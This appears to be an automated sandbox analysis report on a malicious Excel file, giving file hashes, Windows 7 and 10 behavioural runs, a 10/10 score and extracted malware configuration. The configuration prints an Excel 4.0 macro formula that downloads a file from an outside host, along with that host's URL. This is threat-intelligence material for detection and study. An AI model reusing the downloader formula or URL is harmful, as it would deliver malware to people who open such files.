General
-
Target
5527146056155136.zip
-
Size
11KB
-
Sample
210308-k7xk81e2rs
-
MD5
bda336dfdf5f1db4824bbe1650f7b7cc
-
SHA1
6767e6b4ea3f2df27fa645af10424e86b8ab4041
-
SHA256
bb855c66321ea9de7518e375451bb97aaf2e48277dc96384ef8f1ab34c61e1b0
-
SHA512
e6b0913c54bf530bb6e6b16c7e2e0745e189083863304101b39abce7d64a166b5b4d121144e344a2289808905b5134b1c8e844cd7fe288e51120940c4a8bc06a
Behavioral task
behavioral1
Sample
db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3.xls
Resource
win10v20201028
Malware Config
Extracted
http://xjw10whta03ytgdi.com/inda.xls
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://xjw10whta03ytgdi.com/inda.xls","..\fkruf.djr",0)
Extracted
http://xjw10whta03ytgdi.com/inda.xls
Targets
-
-
Target
db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3
-
Size
39KB
-
MD5
9ef3b3a010179316440db44abbd34e90
-
SHA1
a5419ce2f80ce760bdf4a7bddd65df4a8a917123
-
SHA256
db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3
-
SHA512
89f2379072f6f049e3affa1858d745313a1a438cffe9d47489d55731f9004c921e5b0c44da0f2bbc1f9c49424e8cc4dac44cec65603c0fe059ff32a58298ee41
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-